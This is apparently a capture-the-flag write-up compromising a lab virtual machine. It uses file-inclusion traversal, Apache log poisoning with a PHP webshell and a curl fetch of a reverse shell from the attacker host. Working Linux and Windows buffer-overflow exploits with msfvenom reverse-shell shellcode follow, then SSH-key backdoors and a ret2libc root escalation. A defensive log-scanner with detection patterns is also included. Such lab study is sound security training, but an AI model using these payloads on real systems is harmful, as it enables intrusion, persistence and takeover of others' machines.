The target machine is 192.168.56.104.
Port scan

```
sudo nmap --min-rate 10000 -p- 192.168.56.104
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 04:12 UTC
Nmap scan report for 192.168.56.104 (192.168.56.104)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:49:23:DF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.12 seconds
```
```
sudo nmap -sT -sV -sC -O -p22,80 192.168.56.104
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 04:12 UTC
Nmap scan report for 192.168.56.104 (192.168.56.104)
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4d:0e:bf:5f:7c:42:4a:85:95:14:07:6c:07:f8:65:0c (ECDSA)
|_  256 61:cb:06:4a:a5:bf:a2:af:64:0c:9e:d4:20:b0:50:6f (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Coming Soon 10
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:49:23:DF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds
```
Web (Getshell)

Visiting port 80, it looks like nothing more than a portal site. With no domain name, virtual hosts can't be discovered. Directory scanning turned up nothing, and the site has no functionality at all. The only thing left to work with is the URL's page parameter. I tried file inclusion with "../../../../../../etc/passwd", but the response was a blank page. Remote file inclusion doesn't work either.

Perhaps it's being filtered. I found that doubling up bypasses it: "....//....//....//....//etc//passwd" can be read, so presumably the "../" combination is what gets filtered. Remote file inclusion is probably out, then. With a working file inclusion, one way to get a shell is Apache log poisoning, since this site is also built on Apache and PHP.
```
curl -s "http://192.168.56.104/index.php?page=....//....//....//var/log/apache2/access.log" -vv
*   Trying 192.168.56.104:80...
* Connected to 192.168.56.104 (192.168.56.104) port 80
> GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1
> Host: 192.168.56.104
> User-Agent: curl/8.3.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 04 Feb 2024 05:15:43 GMT
< Server: Apache/2.4.52 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 380
< Content-Type: text/html; charset=UTF-8
<
192.168.100.85 - - [24/Jul/2023:05:57:28 +0000] "GET / HTTP/1.1" 200 6111 "-" "-"
192.168.56.102 - - [04/Feb/2024:05:15:26 +0000] "GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1" 200 253 "-" "curl/8.3.0"
192.168.56.102 - - [04/Feb/2024:05:15:38 +0000] "GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1" 200 403 "-" "curl/8.3.0"
* Connection #0 to host 192.168.56.104 left intact
```
It really does read the log file. For some reason, though, every time I do an Apache log poisoning room it sometimes returns a 500 Internal Server Error, and the box has to be reset to recover...
```
curl -s "http://192.168.56.104/" -A "<?php system(\$_GET['shell']); ?>" -vv
```

Write the one-line webshell into the log via the User-Agent.

```
curl -s "http://192.168.56.104/index.php?page=....//....//....//var/log/apache2/access.log&shell=whoami" -vv
```

The output is indeed echoed back. Write a PHP reverse shell, then visit it to trigger.

```
curl -s "http://192.168.56.104/index.php?page=....//....//....//var/log/apache2/access.log&shell=curl%20http://192.168.56.102/reverseshell.php%20-o%20shell.php%20&&%20chmod%20+x%20shell.php" -vv
```

Upgrade the shell to meterpreter.
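The same technique from the defender's side, as an added example that is not part of the original post: a scanner over Apache combined-log lines that flags traversal in the request (the doubled "....//" form and, going beyond the page, its percent-encoded spelling), requests for logs or other sensitive files, and PHP open tags arriving in header fields. The log lines are constructed, modelled on the access.log excerpt above.

```python
import re

# Apache combined log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# "../", the doubled "....//", and percent-encoded variants of the parent reference.
TRAVERSAL_RE = re.compile(r'\.{2,}[/\\]|%2e%2e(?:%2f|%5c|/)', re.I)
# Files an include bug is typically pointed at, the web server's own logs included.
SENSITIVE_RE = re.compile(r'etc/passwd|/var/log/|/proc/self/environ|access\.log|auth\.log', re.I)
# A PHP open tag has no business in a User-Agent or Referer.
PHP_TAG_RE = re.compile(r'<\?(?:php|=)', re.I)


def scan_access_log(lines):
    """Return (client_ip, matched_rules, request) for every suspicious line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; a real deployment would count these
        req, ua, ref = m["req"], m["ua"], m["ref"]
        rules = []
        if TRAVERSAL_RE.search(req):
            rules.append("traversal")
        if SENSITIVE_RE.search(req):
            rules.append("sensitive-file")
        if PHP_TAG_RE.search(ua) or PHP_TAG_RE.search(ref) or PHP_TAG_RE.search(req):
            rules.append("php-in-header")
        if rules:
            findings.append((m["ip"], tuple(rules), req))
    return findings


# Constructed sample, modelled on the access.log excerpt shown above.
SAMPLE_LOG = [
    '192.168.56.1 - - [04/Feb/2024:05:10:01 +0000] "GET / HTTP/1.1" 200 6111 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [04/Feb/2024:05:15:26 +0000] "GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1" 200 253 "-" "curl/8.3.0"',
    '192.168.56.102 - - [04/Feb/2024:05:20:11 +0000] "GET / HTTP/1.1" 200 6111 "-" "<?php system($_GET[\'shell\']); ?>"',
    '10.0.0.5 - - [04/Feb/2024:06:01:45 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1" 200 1024 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for ip, rules, req in scan_access_log(SAMPLE_LOG):
        print(f"{ip:16} {','.join(rules):28} {req}")
```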
Linux buffer overflow

Found three users, but no access to any of them yet. Nothing sensitive in the web directory either, no unusual processes and so on... The www user has no sudo, but I did find the SUID program /opt/others/program.
```
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```
Decompiling it in IDA: when more than one argument is passed, the vuln function is called. It copies the input string a1 into a local buffer dest using strcpy, so there may be a buffer overflow.

Run the binary under pwndbg.
```
chmod +x program
gdb -q program
```
IDA shows dest as 128 bytes. To be safe I'll still debug it: generate 200 characters first.
```
pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Starting program: /home/mikannse/桌面/program aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
```

```
pwndbg> x/gx $rsp
0x7fffffffdd08: 0x6161616161616172
```
The value at rsp is 0x6161616161616172.
```
pwndbg> cyclic -l 0x6161616161616172
Finding cyclic pattern of 8 bytes: b'raaaaaaa' (hex: 0x7261616161616161)
Found at offset 136
```
The offset is 136, which should be the 128 from before plus 8 (rbp).
```
ropper --file program --jmp rax

JMP Instructions
================

0x0000000000401014: call rax;
0x00000000004010cc: jmp rax;
0x000000000040110e: jmp rax;

3 gadgets found
```
Search the program for a usable jmp gadget; exploit as follows:
```python
#!/usr/bin/python3
from pwn import *

offset = 136
shellcode = asm(shellcraft.amd64.sh(), arch="amd64")
# shellcode first, padding up to the saved return address, then the jmp rax gadget
junk = b"A" * (offset - len(shellcode))
callrax = p32(0x4010cc)
payload = shellcode + junk + callrax
shell = process(["./opt/others/program", payload])
shell.interactive()
```
Running it gives a session, but still as www-data... It seems the uid has to be set manually.
```python
#!/usr/bin/python3
from pwn import *

offset = 136
shellcode = b""
# set the real/effective/saved uid to the target user before spawning the shell
shellcode += asm(shellcraft.amd64.setresuid(1002, 1002), arch="amd64")
shellcode += asm(shellcraft.amd64.sh(), arch="amd64")
junk = b"A" * (offset - len(shellcode))
callrax = p32(0x4010cc)
payload = shellcode + junk + callrax
shell = process(["/opt/others/program", payload])
shell.interactive()
```
Now we are cxdxnt!

Set up an SSH backdoor:
```
ssh-keygen
cd .ssh
cp id_rsa.pub authorized_keys
```
Copy the private key over to Kali.
```
sudo -l
```
Windows buffer overflow

Found that we can run /opt/projects/MyFirstProgram.exe with the wine command as gato.

Put the executable into IDA to decompile it, but I couldn't make sense of it QAQ

Never mind; first I ran the program under Immunity Debugger in a Windows environment, where it listens on port 42424. To test for a buffer overflow I fed it 600 characters in one go, and it crashed. So it should be a buffer overflow.
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300
```
First generate 300 characters.

After connecting with netcat and sending it over, the program crashed again.

In Immunity Debugger the EIP value is 0x39654138.
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x39654138
```
The offset is 146.

Test for bad characters:
```python
from pwn import remote

badchars = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
exp = b'A' * 146 + b'B' * 4 + badchars
s = remote("192.168.233.1", 42424)
s.sendline(exp)
s.close()
```
\x00 and \x0a are the two bad characters.
```
!mona jmp -r esp -m myfirstprogram.exe
```
The jmp esp instruction is at 0x080414c3.

Generate the payload:
```
msfvenom -p windows/shell_reverse_tcp lhost=192.168.233.3 lport=1234 -f python -b '\x00\x0a' >poc.py
```
Now the final exploit can be built:
```python
from pwn import remote

jmp_esp = b'\xC3\x14\x04\x08'
some_junk = b'\x90' * 16
buf = b""
buf += b"\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbf"
buf += b"\x95\xd6\xc9\x99\x31\x78\x17\x83\xc0\x04\x03\xed"
buf += b"\xc5\x2b\x6c\xf1\x02\x29\x8f\x09\xd3\x4e\x19\xec"
buf += b"\xe2\x4e\x7d\x65\x54\x7f\xf5\x2b\x59\xf4\x5b\xdf"
buf += b"\xea\x78\x74\xd0\x5b\x36\xa2\xdf\x5c\x6b\x96\x7e"
buf += b"\xdf\x76\xcb\xa0\xde\xb8\x1e\xa1\x27\xa4\xd3\xf3"
buf += b"\xf0\xa2\x46\xe3\x75\xfe\x5a\x88\xc6\xee\xda\x6d"
buf += b"\x9e\x11\xca\x20\x94\x4b\xcc\xc3\x79\xe0\x45\xdb"
buf += b"\x9e\xcd\x1c\x50\x54\xb9\x9e\xb0\xa4\x42\x0c\xfd"
buf += b"\x08\xb1\x4c\x3a\xae\x2a\x3b\x32\xcc\xd7\x3c\x81"
buf += b"\xae\x03\xc8\x11\x08\xc7\x6a\xfd\xa8\x04\xec\x76"
buf += b"\xa6\xe1\x7a\xd0\xab\xf4\xaf\x6b\xd7\x7d\x4e\xbb"
buf += b"\x51\xc5\x75\x1f\x39\x9d\x14\x06\xe7\x70\x28\x58"
buf += b"\x48\x2c\x8c\x13\x65\x39\xbd\x7e\xe2\x8e\x8c\x80"
buf += b"\xf2\x98\x87\xf3\xc0\x07\x3c\x9b\x68\xcf\x9a\x5c"
buf += b"\x8e\xfa\x5b\xf2\x71\x05\x9c\xdb\xb5\x51\xcc\x73"
buf += b"\x1f\xda\x87\x83\xa0\x0f\x07\xd3\x0e\xe0\xe8\x83"
buf += b"\xee\x50\x81\xc9\xe0\x8f\xb1\xf2\x2a\xb8\x58\x09"
buf += b"\xbd\x07\x34\xf8\x3e\xe0\x47\xfa\x44\x22\xce\x1c"
buf += b"\x2e\xd2\x87\xb7\xc7\x4b\x82\x43\x79\x93\x18\x2e"
buf += b"\xb9\x1f\xaf\xcf\x74\xe8\xda\xc3\xe1\x18\x91\xb9"
buf += b"\xa4\x27\x0f\xd5\x2b\xb5\xd4\x25\x25\xa6\x42\x72"
buf += b"\x62\x18\x9b\x16\x9e\x03\x35\x04\x63\xd5\x7e\x8c"
buf += b"\xb8\x26\x80\x0d\x4c\x12\xa6\x1d\x88\x9b\xe2\x49"
buf += b"\x44\xca\xbc\x27\x22\xa4\x0e\x91\xfc\x1b\xd9\x75"
buf += b"\x78\x50\xda\x03\x85\xbd\xac\xeb\x34\x68\xe9\x14"
buf += b"\xf8\xfc\xfd\x6d\xe4\x9c\x02\xa4\xac\xad\x48\xe4"
buf += b"\x85\x25\x15\x7d\x94\x2b\xa6\xa8\xdb\x55\x25\x58"
buf += b"\xa4\xa1\x35\x29\xa1\xee\xf1\xc2\xdb\x7f\x94\xe4"
buf += b"\x48\x7f\xbd"
exp = b'A' * 146 + jmp_esp + some_junk + buf
s = remote("192.168.233.1", 42424)
s.sendline(exp)
s.close()
```
Start a listener, run the exploit, success!

Since that was running in the Windows environment, now all that's needed is to change the IP.
```
msfvenom -p windows/shell_reverse_tcp lhost=192.168.56.102 lport=1234 -f python -b '\x00\x0a' >poc.py
```
```python
from pwn import remote

jmp_esp = b'\xC3\x14\x04\x08'
some_junk = b'\x90' * 16
buf = b""
buf += b"\xdd\xc6\xbd\x1c\x6e\x1b\x2c\xd9\x74\x24\xf4\x5a"
buf += b"\x31\xc9\xb1\x52\x83\xc2\x04\x31\x6a\x13\x03\x76"
buf += b"\x7d\xf9\xd9\x7a\x69\x7f\x21\x82\x6a\xe0\xab\x67"
buf += b"\x5b\x20\xcf\xec\xcc\x90\x9b\xa0\xe0\x5b\xc9\x50"
buf += b"\x72\x29\xc6\x57\x33\x84\x30\x56\xc4\xb5\x01\xf9"
buf += b"\x46\xc4\x55\xd9\x77\x07\xa8\x18\xbf\x7a\x41\x48"
buf += b"\x68\xf0\xf4\x7c\x1d\x4c\xc5\xf7\x6d\x40\x4d\xe4"
buf += b"\x26\x63\x7c\xbb\x3d\x3a\x5e\x3a\x91\x36\xd7\x24"
buf += b"\xf6\x73\xa1\xdf\xcc\x08\x30\x09\x1d\xf0\x9f\x74"
buf += b"\x91\x03\xe1\xb1\x16\xfc\x94\xcb\x64\x81\xae\x08"
buf += b"\x16\x5d\x3a\x8a\xb0\x16\x9c\x76\x40\xfa\x7b\xfd"
buf += b"\x4e\xb7\x08\x59\x53\x46\xdc\xd2\x6f\xc3\xe3\x34"
buf += b"\xe6\x97\xc7\x90\xa2\x4c\x69\x81\x0e\x22\x96\xd1"
buf += b"\xf0\x9b\x32\x9a\x1d\xcf\x4e\xc1\x49\x3c\x63\xf9"
buf += b"\x89\x2a\xf4\x8a\xbb\xf5\xae\x04\xf0\x7e\x69\xd3"
buf += b"\xf7\x54\xcd\x4b\x06\x57\x2e\x42\xcd\x03\x7e\xfc"
buf += b"\xe4\x2b\x15\xfc\x09\xfe\xba\xac\xa5\x51\x7b\x1c"
buf += b"\x06\x02\x13\x76\x89\x7d\x03\x79\x43\x16\xae\x80"
buf += b"\x04\xd9\x87\xb2\xb2\xb1\xd5\xc2\x3e\x90\x53\x24"
buf += b"\x54\x04\x32\xff\xc1\xbd\x1f\x8b\x70\x41\x8a\xf6"
buf += b"\xb3\xc9\x39\x07\x7d\x3a\x37\x1b\xea\xca\x02\x41"
buf += b"\xbd\xd5\xb8\xed\x21\x47\x27\xed\x2c\x74\xf0\xba"
buf += b"\x79\x4a\x09\x2e\x94\xf5\xa3\x4c\x65\x63\x8b\xd4"
buf += b"\xb2\x50\x12\xd5\x37\xec\x30\xc5\x81\xed\x7c\xb1"
buf += b"\x5d\xb8\x2a\x6f\x18\x12\x9d\xd9\xf2\xc9\x77\x8d"
buf += b"\x83\x21\x48\xcb\x8b\x6f\x3e\x33\x3d\xc6\x07\x4c"
buf += b"\xf2\x8e\x8f\x35\xee\x2e\x6f\xec\xaa\x5f\x3a\xac"
buf += b"\x9b\xf7\xe3\x25\x9e\x95\x13\x90\xdd\xa3\x97\x10"
buf += b"\x9e\x57\x87\x51\x9b\x1c\x0f\x8a\xd1\x0d\xfa\xac"
buf += b"\x46\x2d\x2f"
exp = b'A' * 146 + jmp_esp + some_junk + buf
s = remote("192.168.56.104", 42424)
s.sendline(exp)
s.close()
```
On the target, start the program:
```
sudo -u gato /usr/bin/wine /opt/projects/MyFirstProgram.exe
```
Run the exploit, and a reverse shell comes back!

The wine command exists to run programs written for Windows on Linux, so now we just need to swap the reverse shell in the exploit for a Linux one.
```
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.56.102 lport=1234 -f python -b '\x00\x0a' >poc1.py
```
```python
from pwn import remote

jmp_esp = b'\xC3\x14\x04\x08'
some_junk = b'\x90' * 16
buf = b""
buf += b"\xbe\xf7\x8d\x19\xaf\xdb\xd1\xd9\x74\x24\xf4\x5a"
buf += b"\x33\xc9\xb1\x12\x83\xea\xfc\x31\x72\x0e\x03\x85"
buf += b"\x83\xfb\x5a\x58\x47\x0c\x47\xc9\x34\xa0\xe2\xef"
buf += b"\x33\xa7\x43\x89\x8e\xa8\x37\x0c\xa1\x96\xfa\x2e"
buf += b"\x88\x91\xfd\x46\xcb\xca\xc6\xf0\xa3\x08\x37\xf8"
buf += b"\xe1\x84\xd6\xb0\x60\xc7\x49\xe3\xdf\xe4\xe0\xe2"
buf += b"\xed\x6b\xa0\x8c\x83\x44\x36\x24\x34\xb4\x97\xd6"
buf += b"\xad\x43\x04\x44\x7d\xdd\x2a\xd8\x8a\x10\x2c"
exp = b'A' * 146 + jmp_esp + some_junk + buf
s = remote("192.168.56.104", 42424)
s.sendline(exp)
s.close()
```
Now we are gato!!!

Set up an SSH backdoor for gato as well.

Privilege escalation

The last step is exploiting /opt/fixed/new, but I haven't studied this part yet qwq, so I'm copying a pro's writeup.
```python
#!/usr/bin/python2
from pwn import p32

offset = 140
junk = b"A" * offset
libc_base = 0xf7cfe000
system = p32(libc_base + 0x00048150)
exit = p32(libc_base + 0x0003a440)
bin_sh = p32(libc_base + 0x1bd0f5)
payload = junk + system + exit + bin_sh
print(payload)
```
Then run it in a loop:
```
while true; do /opt/fixed/new $(python2 exp.py); done
```
After a while, we are ROOT!

Ramblings

I picked this box at random and didn't expect so many PWN topics, lol. Still, reviewing log poisoning and buffer overflows was worthwhile; I'll study the privilege escalation step when I have time (